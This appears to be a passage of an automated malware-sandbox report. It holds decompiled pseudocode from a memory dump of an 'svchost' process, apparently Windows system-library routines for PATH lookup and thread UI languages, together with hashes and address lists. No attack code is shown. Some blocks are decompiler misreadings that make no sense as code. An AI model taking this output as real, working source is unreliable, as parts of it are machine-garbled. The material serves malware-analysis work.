                        								__eflags = _t309 - 0x3118478;
                        								 *_t327 = ((0 | _t309 == 0x03118478) - 0x00000001 & 0xfffffffb) + 7;
                        								E0306F3E0(_t322,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
                        								_t309 = _v32;
                        								_t336 = _t336 + 0xc;
                        								_t278 = 1;
                        								__eflags = _a8;
                        								_t322 = _t322 + (( *_t309 & 0x0000ffff) >> 1) * 2;
                        								if(_a8 != 0) {
                        									_t270 = E030B39F2(_t322);
                        									_t309 = _v32;
                        									_t322 = _t270;
                        								}
                        							}
                        							_t291 = 0;
                        							_v16 = 0;
                        							__eflags = _v48;
                        							if(_v48 <= 0) {
                        								L31:
                        								_t328 = _v68;
                        								__eflags = 0;
                        								 *((short*)(_t322 - 2)) = 0;
                        								goto L32;
                        							} else {
                        								_t276 = _t327 + _t278 * 4;
                        								_v56 = _t276;
                        								do {
                        									__eflags = _t309;
                        									if(_t309 != 0) {
                        										_t228 =  *(_v60 + _t291 * 4);
                        										__eflags = _t228;
                        										if(_t228 == 0) {
                        											goto L30;
                        										} else {
                        											__eflags = _t228 == 5;
                        											if(_t228 == 5) {
                        												goto L30;
                        											} else {
                        												goto L22;
                        											}
                        										}
                        									} else {
                        										L22:
                        										 *_t276 =  *(_v60 + _t291 * 4);
                        										 *(_t276 + 0x18) = _t322;
                        										_t232 =  *(_v60 + _t291 * 4);
                        										__eflags = _t232 - 8;
                        										if(_t232 > 8) {
                        											goto L56;
                        										} else {
                        											switch( *((intOrPtr*)(_t232 * 4 +  &M03052959))) {
                        												case 0:
                        													__ax =  *0x3118488;
                        													__eflags = __ax;
                        													if(__ax == 0) {
                        														goto L29;
                        													} else {
                        														__ax & 0x0000ffff = E0306F3E0(__edi,  *0x311848c, __ax & 0x0000ffff);
                        														__eax =  *0x3118488 & 0x0000ffff;
                        														goto L26;
                        													}
                        													goto L108;
                        												case 1:
                        													L45:
                        													E0306F3E0(_t322, _v80, _v64);
                        													_t265 = _v64;
                        													goto L26;
                        												case 2:
                        													 *0x3118480 & 0x0000ffff = E0306F3E0(__edi,  *0x3118484,  *0x3118480 & 0x0000ffff);
                        													__eax =  *0x3118480 & 0x0000ffff;
                        													__eax = ( *0x3118480 & 0x0000ffff) >> 1;
                        													__edi = __edi + __eax * 2;
                        													goto L28;
                        												case 3:
                        													__eax = _v44;
                        													__eflags = __eax;
                        													if(__eax == 0) {
                        														goto L29;
                        													} else {
                        														__esi = __eax + __eax;
                        														__eax = E0306F3E0(__edi, _v72, __esi);
                        														__edi = __edi + __esi;
                        														__esi = _v52;
                        														goto L27;
                        													}
                        													goto L108;
                        												case 4:
                        													_push(0x2e);
                        													_pop(__eax);
                        													 *(__esi + 0x44) = __edi;
                        													 *__edi = __ax;
                        													__edi = __edi + 4;
                        													_push(0x3b);
                        													_pop(__eax);
                        													 *(__edi - 2) = __ax;
                        													goto L29;
                        												case 5:
                        													__eflags = _v36;
                        													if(_v36 == 0) {
                        														goto L45;
                        													} else {
                        														E0306F3E0(_t322, _v76, _v36);
                        														_t265 = _v36;
                        													}
                        													L26:
                        													_t336 = _t336 + 0xc;
                        													_t322 = _t322 + (_t265 >> 1) * 2 + 2;
                        													__eflags = _t322;
                        													L27:
                        													_push(0x3b);
                        													_pop(_t267);
                        													 *((short*)(_t322 - 2)) = _t267;
                        													goto L28;
                        												case 6:
                        													__ebx = "\\WIw\\WIw";
                        													__eflags = __ebx - "\\WIw\\WIw";
                        													if(__ebx != "\\WIw\\WIw") {
                        														_push(0x3b);
                        														_pop(__esi);
                        														do {
                        															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                        															E0306F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                        															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                        															__edi = __edi + __eax * 2;
                        															__edi = __edi + 2;
                        															 *(__edi - 2) = __si;
                        															__ebx =  *__ebx;
                        															__eflags = __ebx - "\\WIw\\WIw";
                        														} while (__ebx != "\\WIw\\WIw");
                        														__esi = _v52;
                        														__ecx = _v16;
                        														__edx = _v32;
                        													}
                        													__ebx = _v56;
                        													goto L29;
                        												case 7:
                        													 *0x3118478 & 0x0000ffff = E0306F3E0(__edi,  *0x311847c,  *0x3118478 & 0x0000ffff);
                        													__eax =  *0x3118478 & 0x0000ffff;
                        													__eax = ( *0x3118478 & 0x0000ffff) >> 1;
                        													__eflags = _a8;
                        													__edi = __edi + __eax * 2;
                        													if(_a8 != 0) {
                        														__ecx = __edi;
                        														__eax = E030B39F2(__ecx);
                        														__edi = __eax;
                        													}
                        													goto L28;
                        												case 8:
                        													__eax = 0;
                        													 *(__edi - 2) = __ax;
                        													 *0x3116e58 & 0x0000ffff = E0306F3E0(__edi,  *0x3116e5c,  *0x3116e58 & 0x0000ffff);
                        													 *(__esi + 0x38) = __edi;
                        													__eax =  *0x3116e58 & 0x0000ffff;
                        													__eax = ( *0x3116e58 & 0x0000ffff) >> 1;
                        													__edi = __edi + __eax * 2;
                        													__edi = __edi + 2;
                        													L28:
                        													_t291 = _v16;
                        													_t309 = _v32;
                        													L29:
                        													_t276 = _t276 + 4;
                        													__eflags = _t276;
                        													_v56 = _t276;
                        													goto L30;
                        											}
                        										}
                        									}
                        									goto L108;
                        									L30:
                        									_t291 = _t291 + 1;
                        									_v16 = _t291;
                        									__eflags = _t291 - _v48;
                        								} while (_t291 < _v48);
                        								goto L31;
                        							}
                        						}
                        					}
                        				} else {
                        					while(1) {
                        						L1:
                        						_t232 =  *(_v60 + _t320 * 4);
                        						if(_t232 > 8) {
                        							break;
                        						}
                        						switch( *((intOrPtr*)(_t232 * 4 +  &M03052935))) {
                        							case 0:
                        								__ax =  *0x3118488;
                        								__eflags = __ax;
                        								if(__ax != 0) {
                        									__eax = __ax & 0x0000ffff;
                        									__ebx = __ebx + 2;
                        									__eflags = __ebx;
                        									goto L53;
                        								}
                        								goto L14;
                        							case 1:
                        								L44:
                        								_t309 =  &_v64;
                        								_v80 = E03052E3E(0,  &_v64);
                        								_t276 = _t276 + _v64 + 2;
                        								goto L13;
                        							case 2:
                        								__eax =  *0x3118480 & 0x0000ffff;
                        								__ebx = __ebx + __eax;
                        								__eflags = __dl;
                        								if(__dl != 0) {
                        									__eax = 0x3118480;
                        									goto L80;
                        								}
                        								goto L14;
                        							case 3:
                        								__eax = E0303EEF0(0x31179a0);
                        								__eax =  &_v44;
                        								_push(__eax);
                        								_push(0);
                        								_push(0);
                        								_push(4);
                        								_push(L"PATH");
                        								_push(0);
                        								L57();
                        								__esi = __eax;
                        								_v68 = __esi;
                        								__eflags = __esi - 0xc0000023;
                        								if(__esi != 0xc0000023) {
                        									L10:
                        									__eax = E0303EB70(__ecx, 0x31179a0);
                        									__eflags = __esi - 0xc0000100;
                        									if(__esi == 0xc0000100) {
                        										_v44 = _v44 & 0x00000000;
                        										__eax = 0;
                        										_v68 = 0;
                        										goto L13;
                        									} else {
                        										__eflags = __esi;
                        										if(__esi < 0) {
                        											L32:
                        											_t206 = _v72;
                        											__eflags = _t206;
                        											if(_t206 != 0) {
                        												L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t206);
                        											}
                        											_t207 = _v52;
                        											__eflags = _t207;
                        											if(_t207 != 0) {
                        												__eflags = _t328;
                        												if(_t328 < 0) {
                        													L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t207);
                        													_t207 = 0;
                        												}
                        											}
                        											goto L36;
                        										} else {
                        											__eax = _v44;
                        											__ebx = __ebx + __eax * 2;
                        											__ebx = __ebx + 2;
                        											__eflags = __ebx;
                        											L13:
                        											_t287 = _v36;
                        											goto L14;
                        										}
                        									}
                        								} else {
                        									__eax = _v44;
                        									__ecx =  *0x3117b9c; // 0x0
                        									_v44 + _v44 =  *[fs:0x30];
                        									__ecx = __ecx + 0x180000;
                        									__eax = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                        									_v72 = __eax;
                        									__eflags = __eax;
                        									if(__eax == 0) {
                        										__eax = E0303EB70(__ecx, 0x31179a0);
                        										__eax = _v52;
                        										L36:
                        										_pop(_t321);
                        										_pop(_t329);
                        										__eflags = _v8 ^ _t333;
                        										_pop(_t277);
                        										return E0306B640(_t207, _t277, _v8 ^ _t333, _t309, _t321, _t329);
                        									} else {
                        										__ecx =  &_v44;
                        										_push(__ecx);
                        										_push(_v44);
                        										_push(__eax);
                        										_push(4);
                        										_push(L"PATH");
                        										_push(0);
                        										L57();
                        										__esi = __eax;
                        										_v68 = __eax;
                        										goto L10;
                        									}
                        								}
                        								goto L108;
                        							case 4:
                        								__ebx = __ebx + 4;
                        								goto L14;
                        							case 5:
                        								_t272 = _v56;
                        								if(_v56 != 0) {
                        									_t309 =  &_v36;
                        									_t274 = E03052E3E(_t272,  &_v36);
                        									_t287 = _v36;
                        									_v76 = _t274;
                        								}
                        								if(_t287 == 0) {
                        									goto L44;
                        								} else {
                        									_t276 = _t276 + 2 + _t287;
                        								}
                        								goto L14;
                        							case 6:
                        								__eax =  *0x3115764 & 0x0000ffff;
                        								goto L53;
                        							case 7:
                        								__eax =  *0x3118478 & 0x0000ffff;
                        								__ebx = __ebx + __eax;
                        								__eflags = _a8;
                        								if(_a8 != 0) {
                        									__ebx = __ebx + 0x16;
                        									__ebx = __ebx + __eax;
                        								}
                        								__eflags = __dl;
                        								if(__dl != 0) {
                        									__eax = 0x3118478;
                        									L80:
                        									_v32 = __eax;
                        								}
                        								goto L14;
                        							case 8:
                        								__eax =  *0x3116e58 & 0x0000ffff;
                        								__eax = ( *0x3116e58 & 0x0000ffff) + 2;
                        								L53:
                        								__ebx = __ebx + __eax;
                        								L14:
                        								_t320 = _t320 + 1;
                        								if(_t320 >= _v48) {
                        									goto L16;
                        								} else {
                        									_t309 = _v37;
                        									goto L1;
                        								}
                        								goto L108;
                        						}
                        					}
                        					L56:
                        					asm("int 0x29");
                        					asm("out 0x28, al");
                        					_t233 = _t232 + 0x5286603;
                        					asm("daa");
                        					_t236 = _t233 + 0x5262e03 +  *((intOrPtr*)(_t327 + 0x28)) + 0x5260503;
                        					_t281 = 0x25;
                        					 *_t281 =  *_t281 | _t236;
                        					_t237 = _t336 + _t233;
                        					_t339 = _t236;
                        					 *0x95b3503 =  *0x95b3503 - _t237;
                        					_t238 = _t237 +  *_t309;
                        					 *0x5288003 =  *0x5288003 - _t238;
                        					_t330 = _t327 + _t327;
                        					asm("daa");
                        					_pop(_t283);
                        					 *_t283 =  *_t283 | _t238 + 0xa4f7b06;
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					_push(0x20);
                        					_push(0x30fff00);
                        					E0307D08C(_t283, _t322, _t330);
                        					_v44 =  *[fs:0x18];
                        					_t323 = 0;
                        					 *_a24 = 0;
                        					_t284 = _a12;
                        					__eflags = _t284;
                        					if(_t284 == 0) {
                        						_t245 = 0xc0000100;
                        					} else {
                        						_v8 = 0;
                        						_t331 = 0xc0000100;
                        						_v52 = 0xc0000100;
                        						_t247 = 4;
                        						while(1) {
                        							_v40 = _t247;
                        							__eflags = _t247;
                        							if(_t247 == 0) {
                        								break;
                        							}
                        							_t299 = _t247 * 0xc;
                        							_v48 = _t299;
                        							__eflags = _t284 -  *((intOrPtr*)(_t299 + 0x3001664));
                        							if(__eflags <= 0) {
                        								if(__eflags == 0) {
                        									_t262 = E0306E5C0(_a8,  *((intOrPtr*)(_t299 + 0x3001668)), _t284);
                        									_t339 = _t339 + 0xc;
                        									__eflags = _t262;
                        									if(__eflags == 0) {
                        										_t331 = E030A51BE(_t284,  *((intOrPtr*)(_v48 + 0x300166c)), _a16, _t323, _t331, __eflags, _a20, _a24);
                        										_v52 = _t331;
                        										break;
                        									} else {
                        										_t247 = _v40;
                        										goto L62;
                        									}
                        									goto L70;
                        								} else {
                        									L62:
                        									_t247 = _t247 - 1;
                        									continue;
                        								}
                        							}
                        							break;
                        						}
                        						_v32 = _t331;
                        						__eflags = _t331;
                        						if(_t331 < 0) {
                        							__eflags = _t331 - 0xc0000100;
                        							if(_t331 == 0xc0000100) {
                        								_t295 = _a4;
                        								__eflags = _t295;
                        								if(_t295 != 0) {
                        									_v36 = _t295;
                        									__eflags =  *_t295 - _t323;
                        									if( *_t295 == _t323) {
                        										_t331 = 0xc0000100;
                        										goto L76;
                        									} else {
                        										_t311 =  *((intOrPtr*)(_v44 + 0x30));
                        										_t249 =  *((intOrPtr*)(_t311 + 0x10));
                        										__eflags =  *((intOrPtr*)(_t249 + 0x48)) - _t295;
                        										if( *((intOrPtr*)(_t249 + 0x48)) == _t295) {
                        											__eflags =  *(_t311 + 0x1c);
                        											if( *(_t311 + 0x1c) == 0) {
                        												L106:
                        												_t331 = E03052AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
                        												_v32 = _t331;
                        												__eflags = _t331 - 0xc0000100;
                        												if(_t331 != 0xc0000100) {
                        													goto L69;
                        												} else {
                        													_t323 = 1;
                        													_t295 = _v36;
                        													goto L75;
                        												}
                        											} else {
                        												_t252 = E03036600( *(_t311 + 0x1c));
                        												__eflags = _t252;
                        												if(_t252 != 0) {
                        													goto L106;
                        												} else {
                        													_t295 = _a4;
                        													goto L75;
                        												}
                        											}
                        										} else {
                        											L75:
                        											_t331 = E03052C50(_t295, _a8, _t284, _a16, _a20, _a24, _t323);
                        											L76:
                        											_v32 = _t331;
                        											goto L69;
                        										}
                        									}
                        									goto L108;
                        								} else {
                        									E0303EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        									_v8 = 1;
                        									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                        									_t331 = _a24;
                        									_t259 = E03052AE4( &_v36, _a8, _t284, _a16, _a20, _t331);
                        									_v32 = _t259;
                        									__eflags = _t259 - 0xc0000100;
                        									if(_t259 == 0xc0000100) {
                        										_v32 = E03052C50(_v36, _a8, _t284, _a16, _a20, _t331, 1);
                        									}
                        									_v8 = _t323;
                        									E03052ACB();
                        								}
                        							}
                        						}
                        						L69:
                        						_v8 = 0xfffffffe;
                        						_t245 = _t331;
                        					}
                        					L70:
                        					return E0307D0D1(_t245);
                        				}
                        				L108:
                        			}























































                        0x00000000
                        0x00000000
                        0x03052894
                        0x0305289b
                        0x0305289d
                        0x030528a1
                        0x03095b2b
                        0x03095b2e
                        0x03095b2e
                        0x030528a7
                        0x030528a9
                        0x03095b04
                        0x03095b09
                        0x03095b09
                        0x03095b09
                        0x00000000
                        0x00000000
                        0x03095b35
                        0x03095b3c
                        0x030528fb
                        0x030528fb
                        0x030526cc
                        0x030526cc
                        0x030526d0
                        0x00000000
                        0x030526d2
                        0x030526d2
                        0x00000000
                        0x030526d2
                        0x00000000
                        0x00000000
                        0x030525fe
                        0x0305292d
                        0x03052930
                        0x03052935
                        0x03052937
                        0x0305293e
                        0x03052947
                        0x0305294e
                        0x0305294f
                        0x03052951
                        0x03052951
                        0x03052952
                        0x03052958
                        0x0305295a
                        0x03052960
                        0x03052962
                        0x03052972
                        0x03052973
                        0x0305297e
                        0x0305297f
                        0x03052980
                        0x03052981
                        0x03052982
                        0x03052983
                        0x03052984
                        0x03052985
                        0x03052986
                        0x03052987
                        0x03052988
                        0x03052989
                        0x0305298a
                        0x0305298b
                        0x0305298c
                        0x0305298d
                        0x0305298e
                        0x0305298f
                        0x03052990
                        0x03052992
                        0x03052997
                        0x030529a3
                        0x030529a6
                        0x030529ab
                        0x030529ad
                        0x030529b0
                        0x030529b2
                        0x03095c80
                        0x030529b8
                        0x030529b8
                        0x030529bb
                        0x030529c0
                        0x030529c5
                        0x030529c6
                        0x030529c6
                        0x030529c9
                        0x030529cb
                        0x00000000
                        0x00000000
                        0x030529cd
                        0x030529d0
                        0x030529d9
                        0x030529db
                        0x030529dd
                        0x03052a7f
                        0x03052a84
                        0x03052a87
                        0x03052a89
                        0x03095ca1
                        0x03095ca3
                        0x00000000
                        0x03052a8f
                        0x03052a8f
                        0x00000000
                        0x03052a8f
                        0x00000000
                        0x030529e3
                        0x030529e3
                        0x030529e3
                        0x00000000
                        0x030529e3
                        0x030529dd
                        0x00000000
                        0x030529db
                        0x030529e6
                        0x030529e9
                        0x030529eb
                        0x030529ed
                        0x030529f3
                        0x030529f5
                        0x030529f8
                        0x030529fa
                        0x03052a97
                        0x03052a9a
                        0x03052a9d
                        0x03052add
                        0x00000000
                        0x03052a9f
                        0x03052aa2
                        0x03052aa5
                        0x03052aa8
                        0x03052aab
                        0x03095cab
                        0x03095caf
                        0x03095cc5
                        0x03095cda
                        0x03095cdc
                        0x03095cdf
                        0x03095ce5
                        0x00000000
                        0x03095ceb
                        0x03095ced
                        0x03095cee
                        0x00000000
                        0x03095cee
                        0x03095cb1
                        0x03095cb4
                        0x03095cb9
                        0x03095cbb
                        0x00000000
                        0x03095cbd
                        0x03095cbd
                        0x00000000
                        0x03095cbd
                        0x03095cbb
                        0x03052ab1
                        0x03052ab1
                        0x03052ac4
                        0x03052ac6
                        0x03052ac6
                        0x00000000
                        0x03052ac6
                        0x03052aab
                        0x00000000
                        0x03052a00
                        0x03052a09
                        0x03052a0e
                        0x03052a21
                        0x03052a24
                        0x03052a35
                        0x03052a3a
                        0x03052a3d
                        0x03052a42
                        0x03052a59
                        0x03052a59
                        0x03052a5c
                        0x03052a5f
                        0x03052a5f
                        0x030529fa
                        0x030529f3
                        0x03052a64
                        0x03052a64
                        0x03052a6b
                        0x03052a6b
                        0x03052a6d
                        0x03052a72
                        0x03052a72
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: PATH
                        • API String ID: 0-1036084923
                        • Opcode ID: 6ac34656ab00b2ecb44ebae63dd2b5157922adcb6c5c3abec833a290bfe9cc5c
                        • Instruction ID: d9958caca75ca107907a0cb8aaf93bc50bb9649b692a65f8851c1517acd4ad6e
                        • Opcode Fuzzy Hash: 6ac34656ab00b2ecb44ebae63dd2b5157922adcb6c5c3abec833a290bfe9cc5c
                        • Instruction Fuzzy Hash: 5AC17CB5E022199BDB15DF99D980BEFB7B9FF89700F084829F801BB250D734A941CB64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E0305FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                        				char _v5;
                        				signed int _v8;
                        				signed int _v12;
                        				char _v16;
                        				char _v17;
                        				char _v20;
                        				signed int _v24;
                        				char _v28;
                        				char _v32;
                        				signed int _v40;
                        				void* __ecx;
                        				void* __edi;
                        				void* __ebp;
                        				signed int _t73;
                        				intOrPtr* _t75;
                        				signed int _t77;
                        				signed int _t79;
                        				signed int _t81;
                        				intOrPtr _t83;
                        				intOrPtr _t85;
                        				intOrPtr _t86;
                        				signed int _t91;
                        				signed int _t94;
                        				signed int _t95;
                        				signed int _t96;
                        				signed int _t106;
                        				signed int _t108;
                        				signed int _t114;
                        				signed int _t116;
                        				signed int _t118;
                        				signed int _t122;
                        				signed int _t123;
                        				void* _t129;
                        				signed int _t130;
                        				void* _t132;
                        				intOrPtr* _t134;
                        				signed int _t138;
                        				signed int _t141;
                        				signed int _t147;
                        				intOrPtr _t153;
                        				signed int _t154;
                        				signed int _t155;
                        				signed int _t170;
                        				void* _t174;
                        				signed int _t176;
                        				signed int _t177;
                        
                        				_t129 = __ebx;
                        				_push(_t132);
                        				_push(__esi);
                        				_t174 = _t132;
                        				_t73 =  !( *( *(_t174 + 0x18)));
                        				if(_t73 >= 0) {
                        					L5:
                        					return _t73;
                        				} else {
                        					E0303EEF0(0x3117b60);
                        					_t134 =  *0x3117b84; // 0x77497b80
                        					_t2 = _t174 + 0x24; // 0x24
                        					_t75 = _t2;
                        					if( *_t134 != 0x3117b80) {
                        						_push(3);
                        						asm("int 0x29");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						_push(0x3117b60);
                        						_t170 = _v8;
                        						_v28 = 0;
                        						_v40 = 0;
                        						_v24 = 0;
                        						_v17 = 0;
                        						_v32 = 0;
                        						__eflags = _t170 & 0xffff7cf2;
                        						if((_t170 & 0xffff7cf2) != 0) {
                        							L43:
                        							_t77 = 0xc000000d;
                        						} else {
                        							_t79 = _t170 & 0x0000000c;
                        							__eflags = _t79;
                        							if(_t79 != 0) {
                        								__eflags = _t79 - 0xc;
                        								if(_t79 == 0xc) {
                        									goto L43;
                        								} else {
                        									goto L9;
                        								}
                        							} else {
                        								_t170 = _t170 | 0x00000008;
                        								__eflags = _t170;
                        								L9:
                        								_t81 = _t170 & 0x00000300;
                        								__eflags = _t81 - 0x300;
                        								if(_t81 == 0x300) {
                        									goto L43;
                        								} else {
                        									_t138 = _t170 & 0x00000001;
                        									__eflags = _t138;
                        									_v24 = _t138;
                        									if(_t138 != 0) {
                        										__eflags = _t81;
                        										if(_t81 != 0) {
                        											goto L43;
                        										} else {
                        											goto L11;
                        										}
                        									} else {
                        										L11:
                        										_push(_t129);
                        										_t77 = E03036D90( &_v20);
                        										_t130 = _t77;
                        										__eflags = _t130;
                        										if(_t130 >= 0) {
                        											_push(_t174);
                        											__eflags = _t170 & 0x00000301;
                        											if((_t170 & 0x00000301) == 0) {
                        												_t176 = _a8;
                        												__eflags = _t176;
                        												if(__eflags == 0) {
                        													L64:
                        													_t83 =  *[fs:0x18];
                        													_t177 = 0;
                        													__eflags =  *(_t83 + 0xfb8);
                        													if( *(_t83 + 0xfb8) != 0) {
                        														E030376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                        														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                        													}
                        													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                        													goto L15;
                        												} else {
                        													asm("sbb edx, edx");
                        													_t114 = E030C8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                        													__eflags = _t114;
                        													if(_t114 < 0) {
                        														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                        														E0302B150();
                        													}
                        													_t116 = E030C6D81(_t176,  &_v16);
                        													__eflags = _t116;
                        													if(_t116 >= 0) {
                        														__eflags = _v16 - 2;
                        														if(_v16 < 2) {
                        															L56:
                        															_t118 = E030375CE(_v20, 5, 0);
                        															__eflags = _t118;
                        															if(_t118 < 0) {
                        																L67:
                        																_t130 = 0xc0000017;
                        																goto L32;
                        															} else {
                        																__eflags = _v12;
                        																if(_v12 == 0) {
                        																	goto L67;
                        																} else {
                        																	_t153 =  *0x3118638; // 0x0
                        																	_t122 = L030338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                        																	_t154 = _v12;
                        																	_t130 = _t122;
                        																	__eflags = _t130;
                        																	if(_t130 >= 0) {
                        																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                        																		__eflags = _t123;
                        																		if(_t123 != 0) {
                        																			_t155 = _a12;
                        																			__eflags = _t155;
                        																			if(_t155 != 0) {
                        																				 *_t155 = _t123;
                        																			}
                        																			goto L64;
                        																		} else {
                        																			E030376E2(_t154);
                        																			goto L41;
                        																		}
                        																	} else {
                        																		E030376E2(_t154);
                        																		_t177 = 0;
                        																		goto L18;
                        																	}
                        																}
                        															}
                        														} else {
                        															__eflags =  *_t176;
                        															if( *_t176 != 0) {
                        																goto L56;
                        															} else {
                        																__eflags =  *(_t176 + 2);
                        																if( *(_t176 + 2) == 0) {
                        																	goto L64;
                        																} else {
                        																	goto L56;
                        																}
                        															}
                        														}
                        													} else {
                        														_t130 = 0xc000000d;
                        														goto L32;
                        													}
                        												}
                        												goto L35;
                        											} else {
                        												__eflags = _a8;
                        												if(_a8 != 0) {
                        													_t77 = 0xc000000d;
                        												} else {
                        													_v5 = 1;
                        													L0305FCE3(_v20, _t170);
                        													_t177 = 0;
                        													__eflags = 0;
                        													L15:
                        													_t85 =  *[fs:0x18];
                        													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                        													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                        														L18:
                        														__eflags = _t130;
                        														if(_t130 != 0) {
                        															goto L32;
                        														} else {
                        															__eflags = _v5 - _t130;
                        															if(_v5 == _t130) {
                        																goto L32;
                        															} else {
                        																_t86 =  *[fs:0x18];
                        																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                        																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                        																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                        																}
                        																__eflags = _t177;
                        																if(_t177 == 0) {
                        																	L31:
                        																	__eflags = 0;
                        																	L030370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                        																	goto L32;
                        																} else {
                        																	__eflags = _v24;
                        																	_t91 =  *(_t177 + 0x20);
                        																	if(_v24 != 0) {
                        																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                        																		goto L31;
                        																	} else {
                        																		_t141 = _t91 & 0x00000040;
                        																		__eflags = _t170 & 0x00000100;
                        																		if((_t170 & 0x00000100) == 0) {
                        																			__eflags = _t141;
                        																			if(_t141 == 0) {
                        																				L74:
                        																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                        																				goto L27;
                        																			} else {
                        																				_t177 = E0305FD22(_t177);
                        																				__eflags = _t177;
                        																				if(_t177 == 0) {
                        																					goto L42;
                        																				} else {
                        																					_t130 = E0305FD9B(_t177, 0, 4);
                        																					__eflags = _t130;
                        																					if(_t130 != 0) {
                        																						goto L42;
                        																					} else {
                        																						_t68 = _t177 + 0x20;
                        																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                        																						__eflags =  *_t68;
                        																						_t91 =  *(_t177 + 0x20);
                        																						goto L74;
                        																					}
                        																				}
                        																			}
                        																			goto L35;
                        																		} else {
                        																			__eflags = _t141;
                        																			if(_t141 != 0) {
                        																				_t177 = E0305FD22(_t177);
                        																				__eflags = _t177;
                        																				if(_t177 == 0) {
                        																					L42:
                        																					_t77 = 0xc0000001;
                        																					goto L33;
                        																				} else {
                        																					_t130 = E0305FD9B(_t177, 0, 4);
                        																					__eflags = _t130;
                        																					if(_t130 != 0) {
                        																						goto L42;
                        																					} else {
                        																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                        																						_t91 =  *(_t177 + 0x20);
                        																						goto L26;
                        																					}
                        																				}
                        																				goto L35;
                        																			} else {
                        																				L26:
                        																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                        																				__eflags = _t94;
                        																				L27:
                        																				 *(_t177 + 0x20) = _t94;
                        																				__eflags = _t170 & 0x00008000;
                        																				if((_t170 & 0x00008000) != 0) {
                        																					_t95 = _a12;
                        																					__eflags = _t95;
                        																					if(_t95 != 0) {
                        																						_t96 =  *_t95;
                        																						__eflags = _t96;
                        																						if(_t96 != 0) {
                        																							 *((short*)(_t177 + 0x22)) = 0;
                        																							_t40 = _t177 + 0x20;
                        																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                        																							__eflags =  *_t40;
                        																						}
                        																					}
                        																				}
                        																				goto L31;
                        																			}
                        																		}
                        																	}
                        																}
                        															}
                        														}
                        													} else {
                        														_t147 =  *( *[fs:0x18] + 0xfc0);
                        														_t106 =  *(_t147 + 0x20);
                        														__eflags = _t106 & 0x00000040;
                        														if((_t106 & 0x00000040) != 0) {
                        															_t147 = E0305FD22(_t147);
                        															__eflags = _t147;
                        															if(_t147 == 0) {
                        																L41:
                        																_t130 = 0xc0000001;
                        																L32:
                        																_t77 = _t130;
                        																goto L33;
                        															} else {
                        																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                        																_t106 =  *(_t147 + 0x20);
                        																goto L17;
                        															}
                        															goto L35;
                        														} else {
                        															L17:
                        															_t108 = _t106 | 0x00000080;
                        															__eflags = _t108;
                        															 *(_t147 + 0x20) = _t108;
                        															 *( *[fs:0x18] + 0xfc0) = _t147;
                        															goto L18;
                        														}
                        													}
                        												}
                        											}
                        											L33:
                        										}
                        									}
                        								}
                        							}
                        						}
                        						L35:
                        						return _t77;
                        					} else {
                        						 *_t75 = 0x3117b80;
                        						 *((intOrPtr*)(_t75 + 4)) = _t134;
                        						 *_t134 = _t75;
                        						 *0x3117b84 = _t75;
                        						_t73 = E0303EB70(_t134, 0x3117b60);
                        						if( *0x3117b20 != 0) {
                        							_t73 =  *( *[fs:0x30] + 0xc);
                        							if( *((char*)(_t73 + 0x28)) == 0) {
                        								_t73 = E0303FF60( *0x3117b20);
                        							}
                        						}
